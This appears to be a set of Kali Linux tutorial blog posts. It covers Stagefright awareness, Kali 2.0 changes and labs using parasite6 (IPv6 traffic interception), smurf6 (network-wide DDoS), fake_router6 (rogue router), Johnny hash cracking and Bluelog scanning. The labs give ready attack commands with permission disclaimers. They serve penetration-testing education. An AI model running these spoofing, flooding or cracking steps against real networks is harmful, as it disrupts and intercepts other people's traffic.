Stagefright – All you need to know

Find out whether your device is vulnerable & Defend against Stagefright Vulnerability

Stagefright is one of the latest large scale vulnerabilities that swept up to a billion android devices all over the world. Basically speaking, stagefright vulnerability is the flaw which allows an attacker to control your android device by sending you an MMS message. It can be through your carrier services or Google Hangouts or any other services which has auto download MMS enabled. An attacker can gain access to your device by sending you a malicious MMS. If the malicious MMS gets downloaded in your device the attacker gets access. You need not open the MMS at all. By doing so, the attacker can access your emails, facebook, whatsapp & many other services in your device. So first and foremost, now itself switch off the auto-download Media option in Messaging, Google Hangouts & other specific services you have installed in your android device.

More Specific Details for the IT Guys.

Stagefright is actually a collective set of media formats bundled into a single library used for media playback in android OS. This was written in C++ native in order to improve media processing performance. But C++ is more prone to memory corruption & overflows. In August 2015 (ie this month when this article was written), a company named, Zimpremium providing enterprise mobile security solutions & services, discovered a set of vulnerabilities in the stagefright library. The R&D team of zLabs company officially presented the vulnerabillity in Blackhat USA Aug 5 & DEFCON 23 on Aug 7. In April 2015 an zLabs Security Researcher name Joshua Drake discovered this vulnerability in the Stagefright library. Though he has reported it to google & they have released patches, security researchers believe that there are still 950 million android devices that are vulnerable.

Technically Speaking

There are a set of seven remote code execution & privilege escalation vulnerabilities in the stagefright library. In depth technical details are not available though they are assigned the following CVE numbers. The type of vulnerability, Impact & vulnerable object are mentioned respectively.

CVE-2015-1538 – Integer Overflow, Remote Code Execution, MP4 Atom
CVE-2015-1539 – Integer Overflow, Remote Code Execution, MP4 Atom
CVE-2015-3824 – Integer Overflow, Remote Code Execution, MP4 Atom
CVE-2015-3826 – Buffer Overread, 3GPP Metadata
CVE-2015-3827 – Integer Overflow, Remote Code Execution, MP4 Atom
CVE-2015-3828 – Integer Underflow, Remote Code Execution, 3GPP
CVE-2015-3829 – Integer Overflow, Remote Code Execution, MP4 Atom

See this Video for POC

For the common users & kids

This is nothing major, no need to turn off your smartphones or to increase your blood pressure. This is just simply a bad MMS/Media message which comes to your messaging or Google Hangout or similar apps. What you need to do is to just turn OFF automatic media download & make sure not to open any MMS or even text messages you receive from unknown senders. Also remember to update the apps your phone contains & install new android updates as soon as you see them. If yo are still afriad, turn off the Wifi or Mobile Data, then nobody dares to touch your device. (:P)

How to detect whether your device is Affected

There are some apps in the Play store which have come to detect this vulnerability. Using these apps, you can install them directly to your device & check for yourself from within your device itself. Here I have described 2 apps which can be helpful. They are given below:

Stagefright Detector – Lookout Mobile Security
Stagefright Detector – Zimperium INC.

Stagefright Detector – Lookout Mobile Security

This is more intended to the normal users who doesn’t want the techie-wiggies. This app just clearly detects whether your device has the vulnerablility & shows the result summary. Finding this app is simple. Mostly this app will be the 2nd one when you search for “Stagefright Detector” in the Play store. However here is the link:

Stagefright Detector – Lookout Mobile Security

Install it as you would install a normal app. After installation, just open the app & it starts detection. Once detection is finished, it displays the result. Also it includes some intresting links.

This is simple as you unlock your phone. Try it.

Here are some Screenshots.

Stagefright Detector – Zimperium INC.

This the the app from the Official Security research firm that discovered this vulnerability. In addition to detecting whether vulnerable or not, it provides additional information on which exact variable your device is vulnerable. it also gives some more detailed output in Red & Green CVE Numbers.

eg: If your device has got the 2015-3824 vulnerability, it turns Red. Other which are non existent turns Green.

Finding & Installing the app is simple. This app will be the first one popping out when you search for “stagefright detector” in the play store. Following is the link to the app:

Stagefright Detector – Zimperium INC.

After installation, open the app & tap the “Begin Analysis” Button to start analysing your device. After successful detection, the app displays the result in a manner as described earlier.

Here are the screenshots:

How to defend against it ?

1.Update Android

The best solution is to update Android when it arrives. Officiallly Google has released Android 5.1.1_r9 which patches this issue. It has been made available for Nexus, HTC & Samsung as of now(August 2015). Soon patches for more devices is expected to arrive.

2. Disable Auto Downloads

In fact the first & foremost thing to do is to block all text & MMS messages from unknown sources. Attackers can use these MMSs like a phishing link to gain access into your android device. So here are a list of tasks to do

Turn OFF the auto retrieve for multimedia messages.

In your Android device, Goto Messaging > Settings >Auto-retrive & uncheck the option.

Do the same for Hangouts also.

Conclusion

After heartbleed vulnerability, the most widespread vulnerability which affects a large range of devices is stagefright vulnerability. There are system level & human level patches for this flaw. In my opnion, the human level patch & defence is more necessary as a lot of end-user devices are affected. Creating basic awareness of what this flaw is & how to defend against it is critical to all android device users equally. Helping one protect their Privacy is more like a social work than just saying that your device is vulnerable. So do it in any means you can.

Of Course if you think this article will help in any ways, sharing this will help somebody to protect themselves. So why are you waiting for. Please Like US, Follow US, Subscribe & give feedback.

More Core Changes in Kali Sana (V 2.0)

More Linux Core Changes in Kali Sana are to be noticed. (Also applies to Other Latest Linux Distros)

Recently, some core changes & tweaks were introduced to the Linux architecture & Kernel itself. This article gives an introduction to some of them. Although this focuses on Kali Linux, people using other Linux versions also can use this. These updates are there since 2014 but, are being put to use now only as there are some major changes on the way how the linux system works.

Here in this article, 3 core level changes are discussed.

1. Systemd & Systemctl

2. New Network Manager

3. Journalist

1. Systemd & Systemctl

Systemd is an abbreviation for System Management Deamon. It replaces the init process which was the parent of all processes of a unix system in older versions. Systemd starts processes in parallel as compared with init in older versions which starts serially. This was designed to overcome many limitations of init like kernel panic. Also, the intension was to make things clean as possible. As a result, systemd starts much faster than init. Also there is a new logging system called journald which is described later in this article.

Pratically, the core change is the run levels have been replaced by targets. Also all objects are categorized as targets, sockets, & services. Starting a runlevel is ideologically changed into reaching a target.

https://wiki.debian.org/Debate/initsystem/systemd

Tasks:

1. Check ssh with both methods

2. Some more interesting things using systemctl

Here is a table containing the comparison between init commands & systemd commands. In init based systems, we use service command to control whereas in systemd based, we use systemctl. Have a look at the following table & try it for yourself.

Here are some screenshots(Click to Enlarge).

Here is a list of other systemctl tricks

systemctl show targets #Shows all targets
systemctl list-units  #Lists all units, use pipe to filter out
systemctl list-unit-files  #Lists all unit files
systemctl list-dependencies  #Lists dependencies to all objects
systemctl get-default #Shows the default target, default-graphical.target in Kali Sana
systemctl set-default <target> #Set the target. try multiuser.target

2. New Network Manager – NMCLI

Nmcli & Nmtui are the new 2 interfaces to the network manager in new unix systems. In Kali Linux v 2.0, this new manager to manage Network Connections is available. Nmcli is the command line version & nmtui is the curses like text interface. Other systems like CentOS/RHEL/Fedora etc are also starting to use nmcli.

Using nmcli, we can add, edit or remove network connections & every small details in each of the connections wee have. In addition, creating bridges & bond connections(Team Aggregation) are just a few strokes away.

Tasks

View current State using nmcli
Start & Stop a connection using nmcli
Setup a connection with nmtui

1.View Current Status

nmcli connection show <connection name> <press tab twice to view all connections>
nmcli con show eth0<replace with yours>

Here are some Screenshots(Click to Enlarge)

2. Start & Stop Connections

nmcli con show eth0<replace with yours>
nmcli con down eth0
nmcli con up eth0

3.Setup a connection with nmtui

For this, I have added a new adapter to the VM. Let’s give a static address to the newly added NIC.

NMTUI is an interactive terminal, you can do it by yourself.

Here are screenshots of NMTUI(Click to Enlarge)

Refs: Redhat, GNOME Wiki

3. Journalclt

Journal is a new system which collects log data including their meta data from various sources within a Linux/Unix system. Journaluses a native API fro collecting logs from various sources including systemd, other service deamons, kernel etc. It indexes the collected data & restructures in an efficient manner. As a result, seek times are less. In addition, journal works in parallel to legacy systems like rsyslog and logs are available in the same locations(/var/log)

Journald service is responsible for collecting the logs & doing all the process. Journalctl is an interactive console tool to view journals. Using journalctl, journals can be viewed & sorted out very quickly as the complete data are indexed. So this can help in solving problems a lot faster.

Tasks

View logs with journalctl.

journalctl
journalctl -xn

Here are the screenshots(Click to enlarge)

Refs: Redhat, DigitalOcean

Conclusion

Putting it all toghether, Kali Linux has had a complet core-level change over. Maybe that’s one of the reasons why the developers have gone from Version 1.1 to 2.0 directly. With improved Kernel, logging system & Network Manager, Kali Linux 2.0 has prooved to be more stable & and to emerge(or remain) as an industry standard Pen-testing Distro.

First Look at Kali Linux 2.0

A rebirth of a penetration testing distribution – Kali Linux 2.0 Codename: Kali Sana

On August 11th, Kali Linux Version 2.0 was released. It was codenamed as Sana. After rigorous changes & updates from Kali 1.0 to 1.1, the makers of Kali Linux, Offensive Security have decided to go for version 2.0 with major changes since the release of Kali Linux. Mainly some end user modifications, like accessibility, newer tools, more stable & updated kernel are some of the updates. The developers, have made the new version more user friendly and interactive with latest desktop environments. The developers also say that it is highly customizable. Another major notable thing is that Kali Linux now supports a variety of ARM devices including some of the latest smartphones.

Here are the major updates

GNOME 3 Session

The most tweaky update of all in the new version of Kali Linux is the introduction of a full Gnome 3 session. In the older versions, it was a fallback (with limited features). Many didn’t want to change to Kali from Backtrack because of the completely dark enviornment and a pitch black wallpaper. The new version comes with a bright new wallpaper, the GNOME 3 Hot corner(Apps Overview) a highly customizable sidebar, new, improved & customized GTK-Shell and many more visual tweeks.

Pros:

More user friendly
Highly Customizable
Comes with Gnome-Tweak-Tool by default
Brighter Experience.
Additional features like multiple desktops, easy screen & sound recorder, apps corner etc.

Cons:

Minimum requirements are higher.
Consumes more resources.

Here are some Screenshots

Better Support for ARM & other robotic kits.

Kali Linux

Officially, Kali Linux is now available for all major versions of Google Chromebooks, Raspberry PI Odroids & some more robotic kits. In addition to this, Kali & the Nethunter images have more stable support for devices like Nexus, One Plus 1 which is a new addition. Also the developers claim that it will be easier to compile new drivers since they have included all source kernel headers.

In addition to this, the have given a new VMware/VirtualBox image also with improved Guest addition packages.

Kali linux One Plus 1

Pros:

Complete kernel solves many driver issues found on earlier versions.
Better for those who have knowledge in embedded/robotic/electronic systems.Can be now installed on Chromebooks and other ARM based systems.
Nethunter for Nexus 5 – 10 & for OnePlus 1.

Cons: Probably none

Know More: https://www.offensive-security.com/kali-linux-nethunter-download/

A list of Images: https://www.offensive-security.com/kali-linux-vmware-arm-image-download/

Metasploit

This is one of the major cons in the new version. The new version of Kali Linux comes with the Open-source base package of metasploit and the WebUI & other community/pro services aren’t available. Anyway, Metasploit Community can be downloaded, registered & installed from Rapid7’s website.

Pros:

What could that be ? Yes the advantage is that, the developers claim, it has a faster & smoother experience because of the use of native-ruby packages.

Cons:

Service Metasploit is not available. So one has to manually start up PGSql, initialize the database & connect it.
The much user friendly WebUI of Metasploit Community/PRO is not available.

Updated & Better Tools.

From the first look, the old menu system has undergone some minor changes but some new tools have been added. One of the notable thing is the addition of PixieWPS which can be used for attacking & cracking WPS much faster. Then of course the kernel is Linux kernel 4.0. Also the developers are sticking to debian standards. Source packages are constantly being pulled from the debian testing repo & newer packages are also tested on Kali Linux. This makes it a stable & cutting edge distribution compliant with Debian Standards.

Conclusion

All in all, Offensive Security, the makers of Kali Linux have took the release of Kali Linux 2.0 very seriously. They have brought about some drastic changes making this platform compatible fro a wider number of devices & ensuring more stability. Also new & improved tool set and interface has been introduced in Kali sana making it the most powerful Penetration Testing Distribution to date.

parasite6 – Redirect all IPv6 traffic through your attacker machine

Redirect all IPv6 traffic through your attacker machine with parasite6

Parasite6 is the arpspoof in IPv6 networks and also a part of the THC-IPv6 tools suite. As always they have made it very simple & effective. Parasite6 just spoofs the neighbor advertisement & solicitation packets. Specifically, it advertises that the attacker machine is the router for every neighbor solicitation packet. So virtually all traffic in the IPv6 network gets the false advertisement from the attacker machine & sends all packets to the attacker machine thinking that it is the router. We can either specify a mac address or run without specifying it. Either way, this works very good just like arpspoof tool.

Options

Syntax: parasite6 [-lRFHD] interface [fake-mac]

-l       loops and resends the packets per target every 5 seconds.
-R       try to inject the destination of the solicitation

NS security bypass:

-F       fragment, 
-H       hop-by-hop and 
-D       large destination header

Homepage: https://www.thc.org/thc-ipv6/

Reference: Cisco

Note: This tutorial was written when Kali 1.0.9 was the latest. In newer versions (Kali Sana & Kali Rolling) the command has changed to atk6-tool. For example, you are using parasite6, in the newer version becomes atk6-parasite6.

Lab: Spoof the network and Route all packets through your system.

Scenario: I have an IPv6 network & some IPv6 hosts

IPv6 network : fc00::01/64

Attacker : Kali Linux VM

This is simple as it is. First turn on IPv6 forwarding and run parasite.

Command: echo 1 > /proc/sys/net/ipv6/conf/all/forwarding

Command: parasite6 eth0<replace with your interface> -l

Try different options yourself including giving a fake mac address in square brackets after options.

To evaluate if it’ s working correctly, test with Passive Discovery6. Click here to view tutorial on it. You can also do it with urlsnarf or driftnet or just any other sniffer.

Don’t forget to comment & Subscribe. It’s what keeps us alive.

smurf6

Perform a Smurf attack and a Distributed Denial of Service (DDoS) attack on a on whole IPv6 network using smurf6

Smurf6 is a tool to perform a smurf attack on IPv6 network. A smurf attack is a type of DOS attack where an attacher pings the Broadcast address with a spoofed address of a victim. Eventually all nodes in the network gets an ICMP ping request from the victim’s ip address. As a result all the hosts reply back to the victim IP-address making it a DDoS attack. In IPv4 this attack will not be successful in most of the modern routers & switches. But iPv6 is still vulnerable. Take a look at the following image for better understanding of this attack.

Smurf6 sends a whole lot of ICMP Ping requests to the multicast address in IPv6(Instead of Broadcast in IPv4) with the spoofed IP address of the victim. Eventually all the nodes gives echo replies to the victim host making it a DDoS.

Reference : http://searchsecurity.techtarget.com/definition/smurfing

http://www.cisco.com/web/about/security/intelligence/guide_ddos_defense.html

Homepage: https://www.thc.org/thc-ipv6/

Note: This tutorial was written when Kali 1.0.9 was the latest. In newer versions (Kali Sana & Kali Rolling) the command has changed to atk6-tool. For example you are using smurf6, in newer version becomes atk6-smurf6.

Options

Syntax: smurf6 interface victim-ip [multicast-network-address]

Example: smurf6 eth0 8ea0::001a [8ea0::00/64]

Lab : Perform a Smurf attack on an IPv6 network.

This is pretty simple with smurf6. All you have to do is to find out the network(IPv6) range, and some hosts. Even if you didn’t get any hosts, smurf6 works perfect flooding the entire network with ICMP6 requests. Check out the post on passive discovery to see how to discover IPv6 hosts & network.

http://kalilinuxtutorials.com/ig/passive_discovery6/

Note: This is a vandalizing DDoS attack. The authors of this article or the tool itself are not responsible in any ways for the consequences faced if misused. Use this only on a test network or with a Proper Agreement if in case you want to execute on a live environment.

Scenario: To be frank with you this is very much vandalizing. This crashes all systems in the target network and not only the victim host. For this simple tutorial I had to prepare a lot because the carrying out this attack kills everything in the network. So I had to move into the live machine in order to complete this tutorial. Lets see how.

Coming to the point, I have 2 VMs and a network which supports both IPv4 & IPv6

IPv4 Network Range : 192.168.0.1/24
IPv4 Network Range : fc00::00/64
Attacker Kali Linux (VM): IP:192.168.0.102/24, fc00::05/64
Victim RHEL 7 (VM): IP: 192.168.0.110/24, fc00::03/64
Windows 8.1 PRO (Real System): IP: 192.168.0.100/24, fc00::04/64

Let’s proceed.

command: smurf6 eth0<replace with yours>  fc00::03 [fc00::00/64] <replace with yours>

Wait for 1 minute and you can see everyone in the office going crazy…!

I was able to take only one screenshot. Also, I was performing the attack by taking a SSH session from the Kali box. Otherwise every VMs would crash including my real machine and nothing I could do expect but to take off the power cable. Et… Voila…

Take a good look at the following screenshot, observe my notations on each Windows. You can see the CPU spiking after the attack has been launched.

I am not sure of the reason Offsec included this under Stress testing. Maybe, we can check how much the network & network equipments can take by observing the time taken for every nodes on the network to crash. Or if the network is large and contains large no of hosts & services like Windows AD etc, we can test whether the gateway can handle everything at once or whether something is done to prevent pinging to broadcast address. For now the simplest countermeasure for this attack is to stick with IPv4 and disable IPv6 on internal networks.

Well Enjoy IPv6 Smurfing while it Lasts and don’t forget to subscribe & follow us.

fake_router6

Create a rouge ipv6 router in one simple step with fake_router6

fake_router6 is a tool inside THC-IPv6 tools bundled inside Kali linux to test exploit & attack weaknesses & protocol complexity in ipv6 & icmp6 protocols. As the name suggests, it’s from the Hackers’ Choice. Before we begin the attack, lets get under the hood for a minute. In IPv4, you know what is “ARP”, here in IPv6, its replaced by ND expanded as Neighbor Discovery. ND combines the functionality of ARP,ICMP, ICMP-Redirect & router discovery which is present in IPv4. There are several other advanteges & additional functionalities for ND like to discover neighbouring devices & hosts, link the layer2 (link layer) addresses, advertise the presence of a host/router etc. There are basically 5 types of ND messages.

Router Solicitation (ICMPv6 type 133)
Router Advertisement (ICMPv6 type 134)
Neighbor Solicitation (ICMPv6 type 135)
Neighbor Advertisement (ICMPv6 type 136)
Redirect (ICMPv6 type 137)

Here we can focus on the 2nd one, Router Advertisement. An IPv6 routere sends RA packets in an irregular manner containing the link layer information to the multicast address. This can contain information about the likn layer address of the router, the network range, MTU etc required for the host. When a client host or machine enters the network, it receives this RA packet & connects to the corresponding router and gets an IPv6 address defined in the range.

fake_router6 sends out Router Advertisement packets to the network with highest priority. So even if other IPv6 routers are present in the network, new clients get connected to the rouge router which fake_router6 creates.

Home Page : https://www.thc.org/thc-ipv6/

References : http://tools.kali.org/information-gathering/thc-ipv6

http://computernetworkingnotes.com/ipv6-features-concepts-and-configurations/ipv6-neighbor-discovery.html

https://technet.microsoft.com/en-in/library/cc781672%28v=ws.10%29.aspx

Lets’ See it in action

Note: This tutorial was written when Kali 1.0.9 was the latest. In newer versions (Kali Sana & Kali Rolling) the command has changed to atk6-tool. For example you are using fake_router6, in newer version becomes atk6-fake_router6.

Options

Syntax: fake_router6 [-HFD] interface network-address/prefix-length [dns-server [router-ip-link-local [mtu [mac-address]]]]

-H adds hop-by-hop
-F fragmentation header
-D dst header

Lab : Advertise a fake router in the network

NOTE : This may cause DOS attack, use it wisely. Please use it with permission or on a test network.

Launch the attack simply by a oneline command.

command: fake_router6 eth0 <replace with your interface> bad::00/64 <replace with your fake n/w>

Now I am gonna turn on a Windows 2012 Server VM which I have. Instead you can try with any machine which supports IPv6.

After that, open cmd & issue

Command: ipconfig

Now lets try on a RHEL7 server.

After booting up the system open terminal & issue

Command : ifconfig

If it’s version 7(CentOS/RHEL v7), you can try

nmcli con <name> show | grep bad<replace with your network suffix>

And amazingly, my live system running Windows 8.1 with all updates also got the address of the rouge network even though I didn’t restart the network.

Hope you liked this tutorial. Remember! Be a WhiteHat/GreyHat, don’t be a kiddie. Also Remember to subscribe, comment & follow.

Johnny

Lab 2: Test the complexity of a Windows System, Cracking Windows hashes using Johnny

When cracking Windows passwords if LM hashing is not disabled, two hashes are stored in the SAM database. SAM is Security Accounts Manager. It stores the LM & NTLM hashes in an encrypted form. So first we have to decrypt or dump the hashes into a file. For this other tools in kali linux are there which is described in the series. Check out tool “samdump2” for decrypting & dumping the SAM. For this Lab we have a dumped file containing the LM & NTLM hashes named “hashes”.

The first is the LM hash (relatively easy to crack because of design flaws, but often stored for backwards-compatibility)

The second is the NTLM hash which can be more difficult to crack (when used with strong passwords).

Step 1: Load the hashes file into Johnny.

Step 2: Select LM as format in the options tab.

Step 3: Start Attack and look for results

This one & the previous one on Johnny, these could be really time consuming & processor intensive. It could take upto a millennium to break a password by brute forcing it. So some times (in fact most of the times) we use word-list attack in which a word-list is supplied to crack the password.

If you want to know what is happening under the hood, read on.

Brute-forcing is simply a method of trying all combinations in a particular key space. Say suppose we have a suitcase with a number lock of 3 digits. Suppose you forgot your unlock code. You couldn’t figure it out what was it, what will you do ? Simply you try all combinations under 3 digits from 000 to 999. So how much time it would take to crack the code. Same happens in brute-forcing. Programs & Scripts analyze the type of cryptographic algorithm used, calculates the keyspace & runs through all values inside it.

Also there is word-list attack.In this, a wordlist containing a list of commonly used passwords is supplied to the attack. The program(here john) first finds out the hashing/encryption technique used in the supplied hash. Then the program calculates the corresponding hash of each word in the list supplied and compares it with the hash that needs to be cracked. We will do couple of wordlist attacks in later tutorials. This is also known as “Dictionary Attack”.

http://en.wikipedia.org/wiki/Brute-force_attack

http://searchsecurity.techtarget.com/definition/dictionary-attack

Bluelog

Simple Bluetooth Discovery with Bluelog

Bluelog is a simple Bluetooth scanner that is designed to essentially do just one thing, log all the discoverable devices in the area. It is intended to be used as a site survey tool, identifying the number of possible Bluetooth targets there are in the surrounding environment. This tool only shows visible devices like PCs, phones printers etc. This doesn’t show devices whose visibility is OFF.

Note: Make sure you are not testing this tool on a VM, or if you are, you need to plugin in a USB bluetooth device and attach it to your VM. Also make sure that the device is turned on. Read on for further guidelines.

Options

Syntax: bluelog -i <interface> <options>

Basic Options:

-i <interface> Sets scanning device, default is “hci0”

-o <filename> Sets output filename, default is “devices.log”

-v Verbose, prints discovered devices to the terminal

-q Quiet, turns off nonessential terminal outout

-d Enables daemon mode, Bluelog will run in background

-k Kill an already running Bluelog process

-l Start “Bluelog Live”, default is disabled

Logging Options:

-n Write device names to log, default is disabled

-m Write device manufacturer to log, default is disabled

-c Write device class to log, default is disabled

-f Use “friendly” device class, default is disabled

-t Write timestamps to log, default is disabled

-x Obfuscate discovered MACs, default is disabled

-e Encode discovered MACs with CRC32, default disabled

-b Enable BlueProPro log format, see README

Advanced Options:

-r <retries> Name resolution retries, default is 3

-a <minutes> Amnesia, Bluelog will forget device after given time

-w <seconds> Scanning window in seconds, see README

-s Syslog only mode, no log file. Default is disabled

Bluelog Homepage: http://www.digifail.com/software/bluelog.shtml

Lab1 : Scan all Bluetooth Devices and log them to a file.

In this lab we simply scan for all Bluetooth devices around and log them into a file. First we need to check our Bluetooth interfaces. As I said earlier, make sure to be on a physical machine with bluetooth device turned ON. In some laptops, the hotkeys for turning ON/OFF devices doesn’t work well if you are running kali linux. Then you might have to add additional kernel modules to solve the issue. For the following 2 labs, I have used a Lenovo Notebook, which had some issues in the begining running kali linux. Anyway lets proceed.

Step 1: Ensure your bluetooth device is working and get it’s MAC.

Command:hciconfig

From this we can see the Bluetooth device present in our system/machine. Here we have an interface which is hci0.

Step 2: Start scanning

Command: bluelog -i hci0 -o /root/Desktop/btdevices.log –v

Check the file after btdevices.log after a 10 minutes. You can see all the devices which are nearby you/your working machine.

Lab 2 : Logging Additional Information

In this lab, we log additional information l manufacturer, broadcast names and device class.

Command: bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log –v

Then Check the file btdevices2.log

Note: Remember scanning is a time consuming process. The more patience you have the better are the results. Also this procedure resembles the process of wardriving. If you have a portable device and can get it around, add up some of your social engineering skills, you get great results.